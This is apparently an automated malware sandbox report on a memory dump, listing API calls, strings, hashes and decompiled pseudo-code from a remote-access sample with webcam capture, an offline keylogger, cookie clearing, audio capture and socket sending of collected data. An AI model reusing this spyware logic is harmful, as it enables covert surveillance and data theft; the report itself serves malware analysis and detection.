                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004078AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@D@1@@$wcscpy$FileFindwcscat$?begin@?$basic_string@?c_str@?$basic_string@CloseDirectoryRemoveV01@@$??4?$basic_string@??8std@@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@D@2@@0@EnvironmentExistsExpandFirstG@1@@NextOpenPathQueryStringsV01@V?$basic_string@Value
                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                  • API String ID: 4038348890-4073444585
                                  • Opcode ID: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction ID: e1c57ca4753d391c226bd1858ab1e9d7f4a425f5166415fba7c1daa74d5850da
                                  • Opcode Fuzzy Hash: df8b2c35f0d50c2ef97645c4f9b0cabf715f8f8ad6b3b259de4eb31e8b051f1a
                                  • Instruction Fuzzy Hash: 0F317F72904609EBCB00FBE0DD89DEE777CEB44345B104076F412A3190EB75AA49CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6B015DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                  				char _v20;
                                  				char _v36;
                                  				void* __ebp;
                                  				void* _t22;
                                  				void* _t23;
                                  				void* _t32;
                                  				char* _t33;
                                  				void* _t36;
                                  				void* _t38;
                                  				signed char _t39;
                                  				signed char _t41;
                                  				char* _t42;
                                  				int _t43;
                                  				intOrPtr _t65;
                                  				signed char _t66;
                                  				void* _t68;
                                  				intOrPtr* _t71;
                                  
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t65 =  *__eax;
                                  				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                  				_t71 = _t68 + 0x24;
                                  				_t22 = _t65 - 0x3c;
                                  				if(_t22 == 0) {
                                  					_t23 = E0040180C( &_v20, __eflags, 0);
                                  					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  					_t66 = E00406DD9(_t23);
                                  					__eflags = _t66;
                                  					if(_t66 != 0) {
                                  						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                  						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                  						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                  						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                  						 *0x41b2e8 = 1;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                  						_push(0x1b);
                                  						goto L15;
                                  					}
                                  				} else {
                                  					_t32 = _t22 - 1;
                                  					if(_t32 == 0) {
                                  						__eflags =  *0x41b2e9;
                                  						if(__eflags != 0) {
                                  							goto L8;
                                  						}
                                  					} else {
                                  						_t36 = _t32 - 1;
                                  						if(_t36 == 0) {
                                  							 *0x41b2f0();
                                  							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                  						} else {
                                  							_t38 = _t36 - 1;
                                  							if(_t38 == 0) {
                                  								_t39 =  *0x41b2ec();
                                  								__eflags = _t39;
                                  								 *0x41b2e9 = _t39;
                                  								if(__eflags == 0) {
                                  									goto L9;
                                  								} else {
                                  									L8:
                                  									_t33 = E0040180C( &_v20, __eflags, 0);
                                  									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  									_push(atoi(_t33));
                                  									_push(_a4);
                                  									E00401EA2(__eflags);
                                  								}
                                  							} else {
                                  								if(_t38 == 1) {
                                  									_t41 =  *0x41b2ec();
                                  									_t81 = _t41;
                                  									 *0x41b2e9 = _t41;
                                  									if(_t41 == 0) {
                                  										L9:
                                  										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                  										_push(0x41);
                                  										L15:
                                  										E004020C2(_a4);
                                  									} else {
                                  										_t42 = E0040180C( &_v20, _t81, 0);
                                  										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  										_t43 = atoi(_t42);
                                  										 *_t71 = 0x3e8;
                                  										Sleep(??);
                                  										E00401EA2(_t81);
                                  										 *0x41b2f0(_a4, _t43);
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				E004017DD( &_v20);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401CF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char* _t24;
                                  				char* _t25;
                                  				char* _t33;
                                  				int _t34;
                                  				void* _t46;
                                  				void* _t47;
                                  
                                  				_t47 = __ecx;
                                  				GetLocalTime( &_v20);
                                  				_t24 =  &_v52;
                                  				L00414176();
                                  				_t25 =  &_v36;
                                  				L00414170();
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t46 = malloc(_t25 + 0x64);
                                  				_t33 = _v20.wYear & 0x0000ffff;
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                  				_t34 = sprintf(_t46, _t33);
                                  				if( *((char*)(_t47 + 0x3c)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  				}
                                  				if( *((char*)(_t47 + 0x3d)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  					_t20 = _t47 + 0x34; // 0x0
                                  					_t34 = SetEvent( *_t20);
                                  				}
                                  				free(_t46);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t34;
			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
